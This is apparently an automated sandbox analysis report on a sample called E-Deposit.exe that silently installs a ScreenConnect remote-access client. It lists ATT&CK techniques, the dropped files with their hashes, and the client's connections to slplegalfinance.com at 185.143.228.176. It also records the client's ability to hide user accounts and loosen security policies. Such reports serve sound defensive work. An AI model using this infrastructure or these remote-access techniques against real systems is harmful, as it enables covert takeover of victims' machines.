                                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                                  Valid Accounts
                                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                                  Access Token Manipulation
                                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task31
                                  Virtualization/Sandbox Evasion
                                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers13
                                  Process Injection
                                  GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                                  Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                                  Hidden Users
                                  Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                                  Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                                  Bootkit
                                  Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
                                  Identify RolesWeb ServicesMasquerade as Legitimate ApplicationJavaScriptValid AccountsDynamic-link Library Injection1
                                  Rundll32
                                  Brute ForceCloud GroupsAttack PC via USB ConnectionEmail Forwarding RuleMulti-hop ProxyExfiltration Over Web ServiceEndpoint Denial of Service
                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584729 Sample: E-Deposit.exe Startdate: 06/01/2025 Architecture: WINDOWS Score: 66 53 slplegalfinance.com 2->53 57 Multi AV Scanner detection for submitted file 2->57 59 .NET source code contains potential unpacker 2->59 61 .NET source code references suspicious native API functions 2->61 63 4 other signatures 2->63 8 msiexec.exe 93 51 2->8         started        12 ScreenConnect.ClientService.exe 17 21 2->12         started        15 E-Deposit.exe 6 2->15         started        signatures3 process4 dnsIp5 33 ScreenConnect.Wind...dentialProvider.dll, PE32+ 8->33 dropped 35 C:\...\ScreenConnect.ClientService.exe, PE32 8->35 dropped 37 C:\Windows\Installer\MSI8F8F.tmp, PE32 8->37 dropped 41 9 other files (none is malicious) 8->41 dropped 67 Enables network access during safeboot for specific services 8->67 69 Modifies security policies related information 8->69 17 msiexec.exe 8->17         started        19 msiexec.exe 1 8->19         started        21 msiexec.exe 8->21         started        55 slplegalfinance.com 185.143.228.176, 443, 49705, 49706 ASDETUKhttpwwwheficedcomGB Germany 12->55 71 Reads the Security eventlog 12->71 73 Reads the System eventlog 12->73 23 ScreenConnect.WindowsClient.exe 2 12->23         started        39 C:\Users\user\AppData\...-Deposit.exe.log, ASCII 15->39 dropped 75 Contains functionality to hide user accounts 15->75 26 msiexec.exe 6 15->26         started        file6 signatures7 process8 file9 29 rundll32.exe 11 17->29         started        65 Contains functionality to hide user accounts 23->65 43 C:\Users\user\AppData\Local\...\MSI8413.tmp, PE32 26->43 dropped signatures10 process11 file12 45 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 29->45 dropped 47 C:\...\ScreenConnect.InstallerActions.dll, PE32 29->47 dropped 49 C:\Users\user\...\ScreenConnect.Core.dll, PE32 29->49 dropped 51 4 other files (none is malicious) 29->51 dropped 77 Contains functionality to hide user accounts 29->77 signatures13

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand
                                  SourceDetectionScannerLabelLink
                                  E-Deposit.exe32%VirustotalBrowse
                                  E-Deposit.exe26%ReversingLabsWin32.PUA.ConnectWise
                                  SourceDetectionScannerLabelLink
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI8413.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI8413.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                                  C:\Windows\Installer\MSI89E1.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI8F8F.tmp0%ReversingLabs
                                  No Antivirus matches
                                  No Antivirus matches
                                  SourceDetectionScannerLabelLink
                                  http://slplegalfinance.com:443/d0%Avira URL Cloudsafe
                                  http://slplegalfinance.com:443/80%Avira URL Cloudsafe
                                  http://slplegalfinance.com:443/0%Avira URL Cloudsafe
                                  https://feedback.screenconnect.com/Feedback.axd0%Avira URL Cloudsafe
                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  slplegalfinance.com
                                  185.143.228.176
                                  truefalse
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://wixtoolset.org/releases/rundll32.exe, 00000005.00000003.2027178364.000000000500F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2027343926.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2027178364.000000000507E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                      high
                                      http://slplegalfinance.com:443/dScreenConnect.ClientService.exe, 00000008.00000002.3271609514.0000000001901000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.3271609514.00000000017F3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.3271609514.00000000017D9000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.3271609514.0000000001889000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.3271609514.0000000001743000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.3271609514.000000000172D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.3271609514.00000000014D1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.3271609514.0000000001666000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://wixtoolset.org/news/rundll32.exe, 00000005.00000003.2027178364.000000000500F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2027343926.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2027178364.000000000507E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                        high
                                        http://slplegalfinance.com:443/ScreenConnect.ClientService.exe, 00000008.00000002.3294876651.00000000049F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScreenConnect.ClientService.exe, 00000008.00000002.3271609514.00000000014D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://slplegalfinance.com:443/8ScreenConnect.ClientService.exe, 00000008.00000002.3294876651.00000000049F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000005.00000003.2027178364.000000000500F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2027343926.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2027178364.000000000507E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                            high
                                            https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.3.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://docs.rs/getrandom#nodejs-es-module-supportScreenConnect.WindowsCredentialProvider.dll.3.drfalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              185.143.228.176
                                              slplegalfinance.comGermany
                                              61317ASDETUKhttpwwwheficedcomGBfalse
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1584729
                                              Start date and time:2025-01-06 11:37:06 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 7m 31s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:12
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:E-Deposit.exe
                                              Detection:MAL
                                              Classification:mal66.evad.winEXE@15/63@1/1
                                              EGA Information:
                                              • Successful, ratio: 75%
                                              HCA Information:
                                              • Successful, ratio: 79%
                                              • Number of executed functions: 219
                                              • Number of non-executed functions: 1
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.253.45
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target rundll32.exe, PID 3748 because it is empty
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                              TimeTypeDescription
                                              05:38:04API Interceptor1x Sleep call for process: ScreenConnect.ClientService.exe modified
                                              No context
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              ASDETUKhttpwwwheficedcomGBarmv5l.elfGet hashmaliciousUnknownBrowse
                                              • 134.203.202.155
                                              Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                              • 191.108.204.217
                                              Hilix.mpsl.elfGet hashmaliciousMiraiBrowse
                                              • 173.239.228.7
                                              https://sdazraf.hosted.phplist.com/lists/lt.php?tid=LkQEAA1XAgcGUE4JBFUIGlcAUFAaAwVaVxsIVFpTUgYHD1RQBlwaVAEFUwYKAFQaVVUMABpVUglQGwhSUwYZCl5ZAw4NU1IBVQYATFEGAFJaBQwHGgdSXAYbBVhSABkKAloCGw0GUgEEBgAGVwMADgGet hashmaliciousUnknownBrowse
                                              • 102.165.14.26
                                              armv5l.elfGet hashmaliciousUnknownBrowse
                                              • 154.127.57.214
                                              nsharm7.elfGet hashmaliciousMiraiBrowse
                                              • 102.165.19.216
                                              la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                              • 64.40.25.144
                                              mips.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 45.141.232.110
                                              x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 85.208.114.155
                                              sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 191.104.157.34
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dllSecuredOnedrive.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                                                SecuredOnedrive.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  NotaFiscalOnline.ClientSetup.ex#.exeGet hashmaliciousScreenConnect ToolBrowse
                                                    NotaFiscalOnline.ClientSetup.ex#.exeGet hashmaliciousScreenConnect ToolBrowse
                                                      file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                        file.exeGet hashmaliciousScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, XmrigBrowse
                                                          file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                            dMDImIGmc7.exeGet hashmaliciousScreenConnect ToolBrowse
                                                              dMDImIGmc7.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                estatement020134230003.exe.virus.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dllSecuredOnedrive.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                    SecuredOnedrive.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      NotaFiscalOnline.ClientSetup.ex#.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        NotaFiscalOnline.ClientSetup.ex#.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                          file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                            file.exeGet hashmaliciousScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, XmrigBrowse
                                                                              file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                                                dMDImIGmc7.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                  dMDImIGmc7.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                    estatement020134230003.exe.virus.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):219736
                                                                                      Entropy (8bit):6.581819429590503
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:XW09LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGv:m0uH2aCGw1ST1wQLdqvv
                                                                                      MD5:AADC7BBAE39248A3F7A6790766D4DC54
                                                                                      SHA1:5FDC4531D1B67FE6786CFE6862100F17EDB01389
                                                                                      SHA-256:4DB732E7F458E21E6DA9D38CB7FF065327579CA841C395CD51A49C77FCD41734
                                                                                      SHA-512:6AD49DAE1FFA226D06FA307EA3FE03A19E6448ED6E64BBEF3381FA5C74A24B4ACDC3A6E21BBECD436A5402655F8B13820842D817D01C1B98C0389664EA35161E
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\598741.rbs, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Preview:...@IXOS.@.....@.,&Z.@.....@.....@.....@.....@.....@......&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}'.ScreenConnect Client (484f9eed1d8e13b9)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (484f9eed1d8e13b9)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{E29000A5-D988-BF34-ACFB-64A448AB1544}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{5D9AA345-F8BD-8991-FE6D-9CD87DEF2A88}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{12B3F4C9-0930-DE85-D0AC-49BFF78FE3DC}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{8E57D407-5D27-BB2E-53F9-13C161E29BDA}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{CE2EDB79-B248-8637-FD32-785C13A46331}&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.@......&.{0BF493B6-0475-E8DC-7971-F55AFBC83A92}&.{B8D1B927-3B49-E2F3-F63F
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):347
                                                                                      Entropy (8bit):4.803780834806902
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:8kVXdyrKDLIP12MUAvvR+oHO8fTG6cAtuRTAlrRF4l10hQerKQe9Tn:rHy2DLI4MWoHO8L9cAgRMZRCl1aHmh
                                                                                      MD5:EC6BAD264881A1AE9D05F73712399809
                                                                                      SHA1:A7921B44D20ED663D486210C0775C96C45C08F7B
                                                                                      SHA-256:5748A4BB4CC8E1E9BB3832E1F9E8914038A1B97D2C7523EC342E596317208FB8
                                                                                      SHA-512:ED77CAFA64FE224CB11718CE26906ED807EEB49B2D59E359A7AB0196CE3DBB177663F91E116354E56C6B2441D091A0A07F71413723B7F8DEC1CB946FA2045E64
                                                                                      Malicious:false
                                                                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_%.......&... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.1..../Please do not turn off or unplug your computer...
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5733
                                                                                      Entropy (8bit):4.54751304306711
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:r6KTKyKUeTj26/BcBP61mJkB8KpwhpNeE:rYBcBy1N8J
                                                                                      MD5:6F99B6E5484B5785AB7BF8E46882205A
                                                                                      SHA1:8304A40796E3AA805F96F9AB6FCAC2E5A9676C6E
                                                                                      SHA-256:E15E9D01D8049FF1E1B01E8E9845DF20A4C80A9CF883AA84E0E407A2D865B8E3
                                                                                      SHA-512:56226014F2C00C062D7505687B2166CA2DA905FC921E292EAEDD95DC1FB9AD093EB9D1F657F7BA45B32E6040EE09361FB14535F6D0BF4E19FABF6B19942D928D
                                                                                      Malicious:false
                                                                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADPJ....1P)...H.p...5...............0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.....DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e..... .....PNG........IHDR.............[i.@...KPLTE.x........l......{..v........r.R..m...p..........`..d._..@..s........dFU...0IDATx...n.0.....icS......i.nF.....s.(g..+..u..5V.....i..Mk.T.......y..r]c..p.|.Dy....5.:.[C.........................................................s.>..G..[[).....o.>.Z.-...>...X....W...?....yF.{m|I.8..r.k.NIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIY.l.o.}NctiZc.....r..X.V..7r.......h.,.....IEND.B`...#124586 .........C......................- " " -D*2**2*D<I;7;I<lUKKUl}ici}.............C..
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):50133
                                                                                      Entropy (8bit):4.759054454534641
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                      MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                      SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                      SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                      SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                      Malicious:false
                                                                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):26722
                                                                                      Entropy (8bit):7.7401940386372345
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                      MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                      SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                      SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                      SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                      Malicious:false
                                                                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):197120
                                                                                      Entropy (8bit):6.586775768189165
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:/xLtNGTlIyS7/ObjusqVFJRJcyzvYqSmzDvJXYF:FtNGTGySabqPJYbqSmG
                                                                                      MD5:3724F06F3422F4E42B41E23ACB39B152
                                                                                      SHA1:1220987627782D3C3397D4ABF01AC3777999E01C
                                                                                      SHA-256:EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
                                                                                      SHA-512:509D9A32179A700AD76471B4CD094B8EB6D5D4AE7AD15B20FD76C482ED6D68F44693FC36BCB3999DA9346AE9E43375CD8FE02B61EDEABE4E78C4E2E44BF71D42
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: SecuredOnedrive.ClientSetup.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuredOnedrive.ClientSetup.exe, Detection: malicious, Browse
                                                                                      • Filename: NotaFiscalOnline.ClientSetup.ex#.exe, Detection: malicious, Browse
                                                                                      • Filename: NotaFiscalOnline.ClientSetup.ex#.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: dMDImIGmc7.exe, Detection: malicious, Browse
                                                                                      • Filename: dMDImIGmc7.exe, Detection: malicious, Browse
                                                                                      • Filename: estatement020134230003.exe.virus.exe, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ... ....... .......................`......#.....@.................................A...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
